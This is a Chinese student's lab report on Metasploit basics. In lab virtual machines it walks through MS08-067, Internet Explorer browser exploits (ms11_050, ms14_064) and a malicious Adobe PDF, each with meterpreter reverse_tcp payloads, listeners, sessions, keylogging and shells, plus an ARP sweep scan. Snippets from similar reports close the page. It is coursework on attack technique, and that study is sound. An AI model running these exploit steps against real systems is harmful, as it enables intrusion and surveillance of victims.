20155326刘美岑《网络对抗》Exp5 MSF基础应用

基础问题回答

解释exploit,payload,encode是什么:

  • exploit:就是一个简单的攻击指令,在配置完成之后下发攻击命令。
  • payload:是攻击载荷,是我们在攻击过程中真正用到的部分,进行攻击的实体。
  • encode:是重新进行编码,伪装此次攻击,躲过查杀。

实验过程记录

主动攻击实践:ms06_040

首先,在实验前,检查两个虚拟机能否互相ping通

在kali中打开msf

我首先尝试使用ms06_040进行主动攻击

之后,用show targets查看该漏洞可以攻击的系统版本

通过show payloads 查看所有攻击载荷的信息

设置载荷payload

使用show options 命令查看模块所需的各种参数,这些参数可以保证各个模块正常运行。

接下来就完成一些设置,target、RHOST、LHOST。(因为我要攻击的靶机是英文版的XP系统,所以target设置为3)(RHOST为靶机IP、LHOST为主机IP)

输入exploit命令,开始攻击。可是结果显示攻击失败,没有有效的会话建立,我猜测可能是我在target中设置的系统版本不对。

将target修改为2后,我再次执行攻击命令。可是还是攻击失败。另外,我更换了多个payload也还是不行。我觉得应该是使用的XP靶机中安装了针对该漏洞的补丁。真是遗憾啊.....

下面,我用MS08-067漏洞进行了实验。方法和上面一样,完成了攻击。获得了XP的shell

一个针对浏览器的攻击

我先使用ms12-063进行实验

与实验1中步骤类似,只是多了对LUIR的设置。

完成对参数的设置之后,我输入exploit开始攻击

攻击开始,我在靶机中打开目标网页(192.168.223.128:8080/20155326),显示it works,表明靶机被攻击了。

但是在主机kali中,却不能获得XP的shell,攻击不成功。(我还以为IE7会被攻击,IE6.0也会被攻击,看来不是这样的啊)

后来,我换了个漏洞(ms11-050),继续实验。

主机:192.168.223.129

靶机:192.168.223.130

同上述步骤,第一步,查找相关漏洞信息

然后,加载相应模块

use exploit/windows/browser/ms11_050_mshtml_cobjectelement

找到模块后,可以通过info指令查看模块详细信息

加载payload

set payload windows/meterpreter/reverese_tcp

这里采用meterpreter方式获取权限

设置相应参数,通过show options查看

set URIPATH 5326 //设置访问主页的URI

set LHOST 192.168.223.129 //设置攻击IP

set LPORT 5236 //设置攻击端口

set URLPATH 5326

发起渗透攻击

exploit

此时,在靶机中启动IE 7浏览器,访问链接:http://192.168.211.132:8080/ms5236

失败了。。。使用的这个xp系统中安装的ie浏览器很是奇怪。。看不出版本号,无法找到相应的漏洞。。使用狄维佳同学提供的虚拟机。。

重新进行上述步骤,但此时靶机ip变为192.168.223.130

打开了http://192.168.223.129:8080/ms5326网址后出现了错误警报。。又失败了

一开始使用教程中提到的ms11_050进行攻击的时候总是被数据执行保护程序杀死进程,努力将IE浏览器的的安全级别降到最低也无济于事,连续试了03_020、ms12_037、ms13_009也不成功

重新查找关于IE的exploit,从时间和等级上进行筛选,最后选择windows/browser/ms14_064_ole_code_execution

按照之前的重新进行配置:

exploit之后

靶机中输入指定的网址:

此时安全警告出来了

kali中:

这里msf下可看见创建了一个3个session

sessions -i 1开始连接后抓取靶机键盘,并获取shell

Adobe阅读器渗透攻击(针对客户端)

kali下打开显示隐藏文件,输入use exploit/windows/fileformat/adobe_cooltype_sing,然后输入set payload windows/meterpreter/reverse_tcp设置攻击有效载荷payloads

set LHOST 192.168.223.129

set FILENAME 5326.pdf

set LPORT 5326

exploit,生成pdf文件以后拷贝到xp虚拟机

back返回,使用use exploit/multi/handler新建一个监听模块。

使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。端口号设置和攻击模块里的数据设置相同。

在靶机中打开pdf文件,相当于打开了一个后门程序,这里pdf打不开,因为其中包含了恶意代码

这里msf下可看见创建了一个ID为4的session,sessions -i 1开始连接后抓取靶机键盘

获取shell

应用辅助模块

参考https://www.cnblogs.com/zlslch/p/6893394.html

进入/usr/share/metasploit-framework/modules/auxiliary目录查看有什么项目

选取相应的moudle,在这里选择如下:/scanner/discovery/arp_sweep,在msfconsole中use auxiliary/scanner/discovery/arp_sweep,查看详细信息

设置好相应参数,可以通过show options来查看

set RHOSTS 192.168.223.130 //设置扫描目标IP地址

set THREADS 50 //设置线程数

启动:run,扫描结果如下:

实验感想

这次的实验分为四个小模块,主要是参考已经完成了的同学博客基础上做实验,在不断搜寻漏洞,分析漏洞,进行攻击的过程中,更加熟练的掌握了如何查找相关攻击模块,分析攻击模块的功能、可以加的payload、能够攻击哪些软件和系统、如何进行攻击前的设置,比如用info、show payloads、show targets、show options。在不断的尝试和重复中,巩固了对知识的理解,也熟练了对msfconsole的使用。

原文地址:https://www.cnblogs.com/lmc1998/p/8971852.html

时间: 2024-11-09 04:33:52

20155326刘美岑《网络对抗》Exp5 MSF基础应用的相关文章

2018-2019 20165235 网络对抗 Exp5 MSF基础

2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.168.21.128 永恒之蓝漏洞是利用框架中一个针对SMB服务进行攻击的漏洞,该漏洞导致攻击者在目标系统上可以执行任意代码. 进入msfconsole输入 use exploit/windows/smb/ms17_010_eternalblue.并且通过show payloads 显示可用攻击载荷.

2018-2019 20165221 网络对抗 Exp5 MSF基础

2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms08_067; (1分 一个针对浏览器的攻击,如ms11_050:(1分) 一个针对客户端的攻击,如Adobe:(1分) 成功应用任何一个辅助模块.(0.5分) 具体实验操作 攻击机(kali):192.168.194.128 靶机(win7):192.168.194.129 任务一:主动攻击实践 W

20145326蔡馨熤《网络对抗》——MSF基础应用

20145326蔡馨熤<网络对抗>--MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机. payload:其实就是指装载的"具体内容".就相当于shellcode一样. encode:对需要传输的文件进行编码,使其达到免杀效果. 实验总结与体会 通过这次MSF基础应用的实验.我对MSF里面包括的6个模块都有了一定的认识,先是exploit模块,也就是我们说的渗透模块,包括主

20145318《网络对抗》MSF基础应用

20145318 <网络对抗> MSF基础应用 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067;(2)一个针对浏览器的攻击,如ms11_050:(3)一个针对客户端的攻击,如Adobe(4)成功应用任何一个辅助模块 基础问题回答 exploit:通过漏洞对程序攻击的途径,是一种手段或通道. payload:具体的攻击代码 encode:伪装.隐藏 实践过程 主动攻击:ms08_067 针对浏览器:ms11_05

20145216史婧瑶 《网络对抗》 MSF基础应用

20145216史婧瑶 <网络对抗> MSF基础应用 实验回答问题 用自己的话解释什么是exploit,payload,encode. exploit:渗透攻击模块,测试者利用它来攻击一个系统,程序,或服务,以获得开发者意料之外的结果. payload:攻击载荷模块,由一些可动态运行在远程主机上的代码组成 encode:编码器模块,对指令重新进行编码,用以实现反检测功能.指令顺利执行等 实践过程 主动攻击(ms08_067漏洞) MS08_067远程漏洞攻击实践:Shell 1.在VMware

20155305《网络对抗》MSF基础应用

20155305<网络对抗>MSF基础应用 实验过程 实验系统 靶机1:Windows XP Professional SP2 ,IP地址:192.168.1.108 靶机2:Windows XP Professional SP3 简体中文,IP地址:192.168.1.113 windows XP的虚拟机安装可以在这个网址下载iso镜像,至于序列号就百度吧,会有很多. Kali IP地址:192.168.1.105 1.主动攻击:ms08_067 使用靶机1和Kali 先msfconsole

20145322 《网络对抗》 MSF基础应用1

20145322何志威 Exp5 MS08_067漏洞测试 实验问答 什么是exploit.payload.encode exploit:通过一个漏洞对程序进行攻击的过程 payload:有具体功能作用的代码 encode:对payload进行伪装 实验链接 实验一MS08_067漏洞测试 实验二MS11_050 实验三Adobe阅读器漏洞攻击 实验四利用nmap扫描

20155232《网络对抗》Exp5 MSF基础应用

20155232<网络对抗>Exp5 MSF基础应用 基础问题回答 用自己的话解释什么是exploit,payload,encode. exploit:就是利用可能存在的漏洞对目标进行攻击,相当于一个载具 payload:就是攻击的代码,是载荷. encode:为了帮助攻击载荷避免被杀软发现,进行伪装. 实践总结与体会 在辅助模块这里,可以发现很多旧版本的软件有漏洞,从而可以进行相关的攻击,在此次实验中就体验了旧版本有漏洞的一些软件进行了攻击并且很轻易就实现了,所以有漏洞时,一定要尽快打补丁,

《网络对抗》Exp5 MSF基础应用

20155336<网络对抗>Exp5 MSF基础应用 一.基础知识回答 用自己的话解释什么是exploit,payload,encode exploit:漏洞利用,与靶机进行交互,攻击靶机的最后一步 payload:有效载荷,后面一般加要对靶机进行攻击的代码,可以实现任何运行在受害者环境中的程序所能做的事情 encode:编码器,对代码进行异或运算.去除坏字符等等,保护payload不被发现 二.实践过程 1.Windows服务渗透攻击--MS08-067安全漏洞 ①攻击机:kali ②靶机: